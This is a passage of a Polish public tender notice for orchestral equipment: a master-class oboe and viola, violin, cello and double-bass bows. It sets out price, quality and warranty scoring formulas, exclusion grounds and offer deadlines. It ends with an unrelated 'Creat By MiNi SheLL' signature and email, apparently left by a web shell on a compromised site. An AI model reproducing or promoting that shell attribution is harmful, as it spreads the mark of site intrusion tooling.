wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Obój klasy mistrzowskiej MARIGAUX linia 901 lub równoważny posiadający następujące cechy:<br/>•	Półautomat<br/>•	Wykonany z wyselekcjonowanego drewna Grenadilla suszonego przez minimum 4 lata<br/>•	Mechanizm i klapy: posrebrzane<br/>•	Posiada klapę trzeciej oktawy<br/>•	Posiada klapę lewego F<br/>•	W komplecie futerał, pokrowiec, akcesoria do konserwacji i pielęgnacji oboju<br/>•	Wymagany certyfikat lub oświadczenia producenta, że drewno było sezonowane. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 54000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37314200-4 - Oboje</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Wybór najkorzystniejszej oferty dla następujących części zamówienia:<br/>będzie dokonany na podstawie następujących kryteriów:<br/>a) ceny (C)	- 40 %<br/>b) jakości (J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za zaproponowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość badanej oferty<br/><br/>b)	Punktacja za „jakość” (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członko¬wie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Smyczki altówkowe – 3 szt.<br/>Smyczki altówkowe mistrzowskie sygnowane Thomas G. Acker lub równoważne posiadające następujące cechy:<br/>•	Pręt fernambukowy, okrągły <br/>•	Nić francuska<br/>•	Żabka hebanowa srebrna <br/>•	Waga od 70,8 do 71,8 g<br/>Smyczki skrzypcowe – 2 szt.<br/>Smyczki skrzypcowe mistrzowskie B. Dölling lub równoważne posiadające następujące cechy: <br/>•	Pręt fernambukowy <br/>•	Owijka Fischbein<br/>•	Żabka hebanowa oprawiana w zlocie<br/>•	Waga ok. 60,5 g <br/>Smyczki wiolonczelowe – 2 szt.<br/>Smyczki wiolonczelowe mistrzowskie sygnowane H. Knoll ** lub równoważne posiadające następujące cechy:<br/>•	Pręt fernambukowy <br/>•	Żabka hebanowa oprawiana w złoto <br/>•	Waga ok. 81,5 g<br/>Smyczki kontrabasowe – 2 szt.<br/>Smyczki kontrabasowe, mistrzowskie B. Dölling (system niemiecki) lub równoważne posiadające następujące cechy:<br/>•	Pręt ośmiokątny wykonany z jasnego fernambuku sezonowanego ok. 20 lat<br/>•	Okucia srebrne, drut i skuwka <br/>•	Zasuwka z masy perłowej<br/>•	Kostka na główce z kości z hebanem<br/>•	Pokrętło hebanowe 6 cm <br/>•	Długość całkowita ok. 76 cm<br/>•	Waga ok. 135,0 g </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 142000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37320000-7 - Części i akcesoria do instrumentów muzycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty dla 3. części zamówienia: Smyczki<br/>będzie dokonany na podstawie następujących kryteriów:<br/>a) ceny (C) – 60 %<br/>b) okresu gwarancji (G) – 40 %<br/><br/>Zamawiający przyjmuje zasadę, że 1 % odpowiada 1 punktowi<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za zaproponowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 60 pkt <br/> wartość badanej oferty<br/><br/>b)	Punktacja za oferowany okres gwarancji w miesiącach (G): <br/><br/> okres gwarancji w badanej ofercie (m-ce)<br/>G = ----------------------------------------------------------------------- x 40 pkt <br/> maksymalny oferowany okres gwarancji (m-ce)<br/><br/>Minimalny wymagany okres gwarancji wynosi 24 miesiące <br/>Maksymalny dopuszczalny okres gwarancji wynosi 48 miesięcy<br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W = C + G<br/>gdzie: C - punkty za kryterium cena wyliczone zgodnie ze wzorem w pkt a)<br/>G - punkty za kryterium okres gwarancji wyliczone zgodnie ze wzorem w pkt b)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dla części 1), części 2) i części 3) zamówienia, Zamawiający wymaga dostarczenia certyfikatu lub oświadczenia Wykonawcy, że drewno było sezonowane. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Certyfikat lub oświadczenie Wykonawcy, że drewno było sezonowane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 58 ust. 1 uPzp, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. W tym przypadku Zamawiający wymaga załączenia do oferty oryginału lub uwierzytelnionej kopii pełnomocnictwa podpisanego przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia. <br/>Każdy z wykonawców wspólnie ubiegających się o udzielenie zmówienia składa oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 uPzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany treści umowy pod warunkiem, że ich wprowadzenie nie spowoduje konieczności zmiany treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz jest zgodne z art. 455 uPzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/filharmonia-slaska</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-27 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com